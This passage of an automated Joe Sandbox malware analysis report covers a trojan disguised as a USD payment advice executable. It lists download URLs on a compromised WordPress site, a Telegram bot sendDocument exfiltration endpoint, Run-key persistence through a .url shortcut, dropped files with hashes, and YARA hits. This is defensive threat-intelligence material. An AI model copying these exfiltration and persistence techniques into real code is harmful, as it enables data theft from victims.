                          unknown
                          http://airseaalliance.com/wp-admin/twentUclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll08488374HUclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------xUSD67,884.08_Payment_Advise_9083008849.exe, 00000005.00000002.472146872.00000000026A7000.00000004.00000001.sdmp, Uclldrv.exe, 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmpfalse
                            high
                            https://discord.com/JUclldrv.exe, 0000000D.00000002.363645356.0000000003FF0000.00000004.00000001.sdmp, Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.ipify.orgGETMozilla/5.0Uclldrv.exe, 00000012.00000002.473298428.0000000002797000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://airseaalliance.com/wp-admin/twenty-seventeen/Uclldrv.exe, 00000010.00000002.373966981.0000000004020000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            162.159.136.232
                            unknownUnited States
                            13335CLOUDFLARENETUSfalse
                            198.136.51.123
                            unknownUnited States
                            33182DIMENOCUSfalse
                            162.159.138.232
                            unknownUnited States
                            13335CLOUDFLARENETUSfalse

                            Private

                            IP
                            192.168.2.1

                            General Information

                            Joe Sandbox Version:31.0.0 Red Diamond
                            Analysis ID:321416
                            Start date:21.11.2020
                            Start time:21:00:12
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 11m 43s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:USD67,884.08_Payment_Advise_9083008849.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:25
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@7/5@6/4
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 8.9% (good quality ratio 8.4%)
                            • Quality average: 83.2%
                            • Quality standard deviation: 26.1%
                            HCA Information:
                            • Successful, ratio: 98%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                            • TCP Packets have been reduced to 100
                            • Excluded IPs from analysis (whitelisted): 168.61.161.212, 51.104.139.180, 13.88.21.125, 2.18.68.82, 20.54.26.129, 92.122.213.247, 92.122.213.194
                            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus15.cloudapp.net
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            21:00:56API Interceptor526x Sleep call for process: USD67,884.08_Payment_Advise_9083008849.exe modified
                            21:01:39AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ucll C:\Users\user\AppData\Local\llcU.url
                            21:01:48API Interceptor250x Sleep call for process: Uclldrv.exe modified
                            21:01:48AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ucll C:\Users\user\AppData\Local\llcU.url

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            162.159.136.232USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEGet hashmaliciousBrowse
                              NyUnwsFSCa.exeGet hashmaliciousBrowse
                                PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                  D6vy84I7rJ.exeGet hashmaliciousBrowse
                                    LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exeGet hashmaliciousBrowse
                                      QgwtAnenic.exeGet hashmaliciousBrowse
                                        qclepSi8m5.exeGet hashmaliciousBrowse
                                          99GQMirv2r.exeGet hashmaliciousBrowse
                                            7w6Yl263sM.exeGet hashmaliciousBrowse
                                              8Ce3uRUjxv.exeGet hashmaliciousBrowse
                                                187QadygQl.exeGet hashmaliciousBrowse
                                                  eybgvwBamW.exeGet hashmaliciousBrowse
                                                    R#U00d6SLER Puchase_tcs 10-28-2020,pdf.exeGet hashmaliciousBrowse
                                                      Payment of bank details,zip.exeGet hashmaliciousBrowse
                                                        Documentos_ordine.exeGet hashmaliciousBrowse
                                                          PO CBV87654468,pdf.exeGet hashmaliciousBrowse
                                                            Master Jurilia MV_PACIFIC_Grace TutiCorin.exeGet hashmaliciousBrowse
                                                              Bkrndbc_Signed_.exeGet hashmaliciousBrowse
                                                                PO102620.exeGet hashmaliciousBrowse
                                                                  Ilpgivn_Signed_.exeGet hashmaliciousBrowse
                                                                    162.159.138.232USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEGet hashmaliciousBrowse
                                                                      9Pimjl3jyq.exeGet hashmaliciousBrowse
                                                                        RFQ for TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                          99GQMirv2r.exeGet hashmaliciousBrowse
                                                                            8Ce3uRUjxv.exeGet hashmaliciousBrowse
                                                                              NEW PO # 20001578.exeGet hashmaliciousBrowse
                                                                                HSBC-0914.exeGet hashmaliciousBrowse
                                                                                  Payment of bank details,zip.exeGet hashmaliciousBrowse
                                                                                    PO CBV87654468,pdf.exeGet hashmaliciousBrowse
                                                                                      Master Jurilia MV_PACIFIC_Grace TutiCorin.exeGet hashmaliciousBrowse
                                                                                        Bkrndbc_Signed_.exeGet hashmaliciousBrowse
                                                                                          aFYqaxx4On.exeGet hashmaliciousBrowse
                                                                                            s8d5H0hJyx.exeGet hashmaliciousBrowse
                                                                                              DHL PARCEL AWB 1222576549.exeGet hashmaliciousBrowse
                                                                                                BREACHOFDATA.exeGet hashmaliciousBrowse
                                                                                                  DHL_889887.exeGet hashmaliciousBrowse
                                                                                                    HSBC File.exeGet hashmaliciousBrowse
                                                                                                      Bank Receipt 23.10.exeGet hashmaliciousBrowse
                                                                                                        PROFORMA Updt NR.119220_REV_3 Copies IMG_00002892.exeGet hashmaliciousBrowse
                                                                                                          DHL_314142.exeGet hashmaliciousBrowse

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                            discord.comUSD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEGet hashmaliciousBrowse
                                                                                                            • 162.159.138.232
                                                                                                            NyUnwsFSCa.exeGet hashmaliciousBrowse
                                                                                                            • 162.159.135.232
                                                                                                            Fl0aIIH39W.exeGet hashmaliciousBrowse
                                                                                                            • 162.159.138.232
                                                                                                            PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                                                                                            • 162.159.135.232
                                                                                                            9Pimjl3jyq.exeGet hashmaliciousBrowse
                                                                                                            • 162.159.138.232
                                                                                                            D6vy84I7rJ.exeGet hashmaliciousBrowse
                                                                                                            • 162.159.135.232
                                                                                                            RFQ for TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                                                            • 162.159.138.232
                                                                                                            Payment Confirmation NOV-85869983TGTTAS.exeGet hashmaliciousBrowse
                                                                                                            • 162.159.128.233
                                                                                                            LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exeGet hashmaliciousBrowse
                                                                                                            • 162.159.137.232
                                                                                                            LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exeGet hashmaliciousBrowse
                                                                                                            • 162.159.136.232
                                                                                                            QgwtAnenic.exeGet hashmaliciousBrowse
                                                                                                            • 162.159.136.232
                                                                                                            qclepSi8m5.exeGet hashmaliciousBrowse
                                                                                                            • 162.159.136.232
                                                                                                            8fJPaTfN8D.exeGet hashmaliciousBrowse
                                                                                                            • 162.159.137.232
                                                                                                            LJLMG5Syza.exeGet hashmaliciousBrowse
                                                                                                            • 162.159.137.232
                                                                                                            99GQMirv2r.exeGet hashmaliciousBrowse
                                                                                                            • 162.159.136.232
                                                                                                            7w6Yl263sM.exeGet hashmaliciousBrowse
                                                                                                            • 162.159.136.232
                                                                                                            oAkfKRTCvN.exeGet hashmaliciousBrowse
                                                                                                            • 162.159.128.233
                                                                                                            8Ce3uRUjxv.exeGet hashmaliciousBrowse
                                                                                                            • 162.159.136.232
                                                                                                            plata bancara.exeGet hashmaliciousBrowse
                                                                                                            • 162.159.135.232
                                                                                                            187QadygQl.exeGet hashmaliciousBrowse
                                                                                                            • 162.159.136.232

                                                                                                            ASN

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                            CLOUDFLARENETUShttps://www.canva.com/design/DAEOEcu9Gnc/C6LvqPRfMOYoF6OWlu9bVg/view?utm_content=DAEOEcu9Gnc&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            https://www.canva.com/design/DAEOEcu9Gnc/C6LvqPRfMOYoF6OWlu9bVg/view?utm_content=DAEOEcu9Gnc&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            1.apkGet hashmaliciousBrowse
                                                                                                            • 172.67.163.11
                                                                                                            Fennec Pharma .docxGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            activate_36059.EXEGet hashmaliciousBrowse
                                                                                                            • 172.67.75.29
                                                                                                            Fennec Pharma.xlsxGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            https://elharless.github.io/stamapdevmo/tak.html?bbre=oadfis48sdGet hashmaliciousBrowse
                                                                                                            • 172.67.185.66
                                                                                                            https://albanesebros.sendx.io/lp/shared-doc.htmlGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            https://xerox879784379923.azureedge.net??#ZGluYS5qb25nZWtyeWdAYWxhc2thYWlyLmNvbQGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            https://faxfax.zizera.com/remittanceadviceGet hashmaliciousBrowse
                                                                                                            • 104.16.18.94
                                                                                                            https://flyboyfurnishings.com/firstam/RD-FITTGet hashmaliciousBrowse
                                                                                                            • 104.16.18.94
                                                                                                            http://ec.autohonda.itGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            Payment Invoice.exeGet hashmaliciousBrowse
                                                                                                            • 104.24.126.89
                                                                                                            https://mcmms.typeform.com/to/Vtnb9OBCGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            NQQWym075C.exeGet hashmaliciousBrowse
                                                                                                            • 23.227.38.64
                                                                                                            http://www.portal.office.com.s3-website.us-east-2.amazonaws.com#p.steinberger@wafra.comGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            https://storage.googleapis.com/storesll0f4bb6d9b7f964569155d2bb42628/a83416219a20d87f4dabde9f057f93b5.html#p.steinberger@wafra.comGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            ARjQJiNmBs.exeGet hashmaliciousBrowse
                                                                                                            • 104.18.88.101
                                                                                                            1piS4PBvBp.exeGet hashmaliciousBrowse
                                                                                                            • 104.18.88.101
                                                                                                            https://largemail.r1.rpost.net/files/7xU97qcFgCvB3Uv1wDC4qvS2ZriLfublohKWA5V3/ln/en-usGet hashmaliciousBrowse
                                                                                                            • 104.26.9.44
                                                                                                            DIMENOCUShttp://www.947947.mirramodaintima.com.br/#aHR0cHM6Ly9lbXl0dXJrLmNvbS9zZC9JSy9vZjEvRmlkZWwuVG9ycmVzQHNlYXJzaGMuY29tGet hashmaliciousBrowse
                                                                                                            • 177.234.159.42
                                                                                                            invoice.exeGet hashmaliciousBrowse
                                                                                                            • 109.73.164.114
                                                                                                            ddos________ (IW0Irt2zSey6D6LMEgcs2kqQiSuMa 8 G).jsGet hashmaliciousBrowse
                                                                                                            • 67.23.238.50
                                                                                                            ddos________ (IW0Irt2zSey6D6LMEgcs2kqQiSuMa 8 G).jsGet hashmaliciousBrowse
                                                                                                            • 67.23.238.50
                                                                                                            Richiesta Urgente.pdf.exeGet hashmaliciousBrowse
                                                                                                            • 64.37.52.42
                                                                                                            VRVA8aGgQc.exeGet hashmaliciousBrowse
                                                                                                            • 138.128.167.210
                                                                                                            af6y2Oe5lX.exeGet hashmaliciousBrowse
                                                                                                            • 138.128.171.170
                                                                                                            https://encrypt.puzzledpuppy.com/Get hashmaliciousBrowse
                                                                                                            • 67.23.254.10
                                                                                                            iSrBUSEJzI.exeGet hashmaliciousBrowse
                                                                                                            • 67.23.242.109
                                                                                                            VncDfMvr.exeGet hashmaliciousBrowse
                                                                                                            • 138.121.203.205
                                                                                                            doc_pack-1177677900.xlsGet hashmaliciousBrowse
                                                                                                            • 198.49.68.125
                                                                                                            doc_pack-1176294411.xlsGet hashmaliciousBrowse
                                                                                                            • 198.49.68.125
                                                                                                            doc_pack-1176283396.xlsGet hashmaliciousBrowse
                                                                                                            • 198.49.68.125
                                                                                                            doc_pack-1150040064.xlsGet hashmaliciousBrowse
                                                                                                            • 198.49.68.125
                                                                                                            doc_pack-116797112.xlsGet hashmaliciousBrowse
                                                                                                            • 198.49.68.125
                                                                                                            doc_pack-1152979951.xlsGet hashmaliciousBrowse
                                                                                                            • 198.49.68.125
                                                                                                            doc_pack-1172943982.xlsGet hashmaliciousBrowse
                                                                                                            • 198.49.68.125
                                                                                                            doc_pack-1168834311.xlsGet hashmaliciousBrowse
                                                                                                            • 198.49.68.125
                                                                                                            doc_pack-1175649875.xlsGet hashmaliciousBrowse
                                                                                                            • 198.49.68.125
                                                                                                            doc_pack-1161987695.xlsGet hashmaliciousBrowse
                                                                                                            • 198.49.68.125
                                                                                                            CLOUDFLARENETUShttps://www.canva.com/design/DAEOEcu9Gnc/C6LvqPRfMOYoF6OWlu9bVg/view?utm_content=DAEOEcu9Gnc&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            https://www.canva.com/design/DAEOEcu9Gnc/C6LvqPRfMOYoF6OWlu9bVg/view?utm_content=DAEOEcu9Gnc&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            1.apkGet hashmaliciousBrowse
                                                                                                            • 172.67.163.11
                                                                                                            Fennec Pharma .docxGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            activate_36059.EXEGet hashmaliciousBrowse
                                                                                                            • 172.67.75.29
                                                                                                            Fennec Pharma.xlsxGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            https://elharless.github.io/stamapdevmo/tak.html?bbre=oadfis48sdGet hashmaliciousBrowse
                                                                                                            • 172.67.185.66
                                                                                                            https://albanesebros.sendx.io/lp/shared-doc.htmlGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            https://xerox879784379923.azureedge.net??#ZGluYS5qb25nZWtyeWdAYWxhc2thYWlyLmNvbQGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            https://faxfax.zizera.com/remittanceadviceGet hashmaliciousBrowse
                                                                                                            • 104.16.18.94
                                                                                                            https://flyboyfurnishings.com/firstam/RD-FITTGet hashmaliciousBrowse
                                                                                                            • 104.16.18.94
                                                                                                            http://ec.autohonda.itGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            Payment Invoice.exeGet hashmaliciousBrowse
                                                                                                            • 104.24.126.89
                                                                                                            https://mcmms.typeform.com/to/Vtnb9OBCGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            NQQWym075C.exeGet hashmaliciousBrowse
                                                                                                            • 23.227.38.64
                                                                                                            http://www.portal.office.com.s3-website.us-east-2.amazonaws.com#p.steinberger@wafra.comGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            https://storage.googleapis.com/storesll0f4bb6d9b7f964569155d2bb42628/a83416219a20d87f4dabde9f057f93b5.html#p.steinberger@wafra.comGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            ARjQJiNmBs.exeGet hashmaliciousBrowse
                                                                                                            • 104.18.88.101
                                                                                                            1piS4PBvBp.exeGet hashmaliciousBrowse
                                                                                                            • 104.18.88.101
                                                                                                            https://largemail.r1.rpost.net/files/7xU97qcFgCvB3Uv1wDC4qvS2ZriLfublohKWA5V3/ln/en-usGet hashmaliciousBrowse
                                                                                                            • 104.26.9.44

                                                                                                            JA3 Fingerprints

                                                                                                            No context

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\Ucll08488374ODU8[1]
                                                                                                            Process:C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                            Category:downloaded
                                                                                                            Size (bytes):1114112
                                                                                                            Entropy (8bit):3.9946821874476472
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:dUn7jAgqESZPGrFuwdUBeQ1LLyTaagnPT+SoUrco/QEBMSyt6yV:e
                                                                                                            MD5:A58901F05995FAA13C445E5A034E438A
                                                                                                            SHA1:122C5093FC63097614AE835B3A0C16501435E13B
                                                                                                            SHA-256:19FF839203BFDE839FDBAABBC15CA07578B8CF7447E5125D16674251733CC2D0
                                                                                                            SHA-512:954DFF11D4174739AD6B9EF52AF90A052EF93DEB489D6FA1F5699D33D7C2960A3AEDDFA5D810A1F05696F40A32B3025A57B8EBD320FD20F3AD983BA64C16EB72
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            IE Cache URL:http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8
                                                                                                            Preview: 70c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706d79310537302c7f1d5c19391b6f2c595c7d52343f303f4d4079572c312630577c7e547b7977751e1879560f03656013106b5d797c061c6e6c73561f771719077a1954727c066b16160a4b73700b6169681d547e77196f1b1e752e0b01096f79106e2b6d1766691d10795176737e721916745409086d641f176e507375011b60617150147f1315007f145e7b7b01651b140c407b7407666c65175d7970176219187e260f0d0e6a741a672c6a196b6b1b1b71557a747b7f131f735307056f62141f6a5c74700c116966765e197d151e087b18597e7a262c5d64765d79757a7213107b5d0d0d636b1b18625f75710111666e785411711c110f731b587f7b7a70020a7c55757c75751b1
                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\Ucll08488374ODU8[2]
                                                                                                            Process:C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1093675
                                                                                                            Entropy (8bit):3.9950764069850555
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:dUn7jAgqESZPGrFuwdUBeQ1LLyTaagnPT+SoUrco/QEBMSyt6f:P
                                                                                                            MD5:10EED55FFF2D34F5E878B515A30BDD8E
                                                                                                            SHA1:8300F0DF2E40FF893A468014174A8C5BBF5DA69E
                                                                                                            SHA-256:DF94CD85FBF8691A25CEB452BA8E2BD2278CBFC673834B331D83F934EABD14EE
                                                                                                            SHA-512:1558BC0E6214C812508A411A0FCE1B84074D5A66E3594FF7CA98C2572CF1AC9E5364A70C6B2A4D4AABE916E14DF8C2B31461A6FF364F11260FA14388A7F7269A
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview: 70c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706d79310537302c7f1d5c19391b6f2c595c7d52343f303f4d4079572c312630577c7e547b7977751e1879560f03656013106b5d797c061c6e6c73561f771719077a1954727c066b16160a4b73700b6169681d547e77196f1b1e752e0b01096f79106e2b6d1766691d10795176737e721916745409086d641f176e507375011b60617150147f1315007f145e7b7b01651b140c407b7407666c65175d7970176219187e260f0d0e6a741a672c6a196b6b1b1b71557a747b7f131f735307056f62141f6a5c74700c116966765e197d151e087b18597e7a262c5d64765d79757a7213107b5d0d0d636b1b18625f75710111666e785411711c110f731b587f7b7a70020a7c55757c75751b1
                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Ucll08488374ODU8[1]
                                                                                                            Process:C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1114112
                                                                                                            Entropy (8bit):3.9946821874476472
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:dUn7jAgqESZPGrFuwdUBeQ1LLyTaagnPT+SoUrco/QEBMSyt6yV:e
                                                                                                            MD5:A58901F05995FAA13C445E5A034E438A
                                                                                                            SHA1:122C5093FC63097614AE835B3A0C16501435E13B
                                                                                                            SHA-256:19FF839203BFDE839FDBAABBC15CA07578B8CF7447E5125D16674251733CC2D0
                                                                                                            SHA-512:954DFF11D4174739AD6B9EF52AF90A052EF93DEB489D6FA1F5699D33D7C2960A3AEDDFA5D810A1F05696F40A32B3025A57B8EBD320FD20F3AD983BA64C16EB72
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview: 70c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706d79310537302c7f1d5c19391b6f2c595c7d52343f303f4d4079572c312630577c7e547b7977751e1879560f03656013106b5d797c061c6e6c73561f771719077a1954727c066b16160a4b73700b6169681d547e77196f1b1e752e0b01096f79106e2b6d1766691d10795176737e721916745409086d641f176e507375011b60617150147f1315007f145e7b7b01651b140c407b7407666c65175d7970176219187e260f0d0e6a741a672c6a196b6b1b1b71557a747b7f131f735307056f62141f6a5c74700c116966765e197d151e087b18597e7a262c5d64765d79757a7213107b5d0d0d636b1b18625f75710111666e785411711c110f731b587f7b7a70020a7c55757c75751b1
                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
                                                                                                            Process:C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):881008
                                                                                                            Entropy (8bit):6.904627526557324
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:sp7ku8t5ppfEQetKjNRfdjmrY2CprWkbR7X8uD79b7eUlgufunPQNZT:sp7Xs5otKjNR1J2YRPDR2eZfunPQDT
                                                                                                            MD5:947EDEB169369AC67C5448CC2F8104A3
                                                                                                            SHA1:5D2181F018AB4B8AFD6B193E4651233B44AD7D62
                                                                                                            SHA-256:3A89A79E825BF330E3EA46F6A5F548529B642DC61219A8DEEAEC070A0688A08E
                                                                                                            SHA-512:798B7004B2019FFBFF67A1F3636AD7DD3B93EF0A9338960D8A7E69EDA79AA7D9E097AA888B68F942E21F0A89E98DCA66D679F56D06B9AB7B81C4241B1F5840F8
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 23%
                                                                                                            Reputation:low
                                                                                                            Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................N......l........ ....@..............................................@...........................p...$...`...l...........Z..p.......@...................................................................................CODE................................ ..`DATA..... ... ..."..................@...BSS..........P...........................idata...$...p...&..................@....tls....@............T...................rdata...............T..............@..P.reloc..@............V..............@..P.rsrc....l...`...l..................@..P.....................T..............@..P........................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\llcU.url
                                                                                                            Process:C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
                                                                                                            File Type:MS Windows 95 Internet shortcut text (URL=<file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Uclldrv.exe>), ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):169
                                                                                                            Entropy (8bit):5.137619399669998
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:HRAbABGQYmHmEX+T+Bf5pEkD5oef5yaKdhXgrvQJ5ontCBuXV9k/qIH19Yxv:HRYFVmc0ckDlR9MhXgrvQJ5OtZF9k/qx
                                                                                                            MD5:C383417198123C1B803E7228FE264791
                                                                                                            SHA1:BBBE7674406F0E703C292059074DB0E18A7743E4
                                                                                                            SHA-256:3B79CA662589E4B480EF64A965C9E429C97E93195784D50B2AA7E92E7F35E7D7
                                                                                                            SHA-512:81E249F3E56695E00970FCAC2E43DE9175271A7A95D3C9BD48883ED7CB6FA9B99681BEF458A74888DE3AC590840E413B5A9DD7CC5C2C82398D147ABE2C57CE08
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\llcU.url, Author: @itsreallynick (Nick Carr)
                                                                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\llcU.url, Author: @itsreallynick (Nick Carr)
                                                                                                            • Rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\llcU.url, Author: @itsreallynick (Nick Carr)
                                                                                                            Reputation:low
                                                                                                            Preview: [InternetShortcut]..URL=file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Uclldrv.exe..IconIndex=1..IconFile=.url..Modified=20F06BA06D07BD014D..HotKey=1601..

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):6.904627526557324
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                                                            • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                                                            • Windows Screen Saver (13104/52) 0.13%
                                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                            File name:USD67,884.08_Payment_Advise_9083008849.exe
                                                                                                            File size:881008
                                                                                                            MD5:947edeb169369ac67c5448cc2f8104a3
                                                                                                            SHA1:5d2181f018ab4b8afd6b193e4651233b44ad7d62
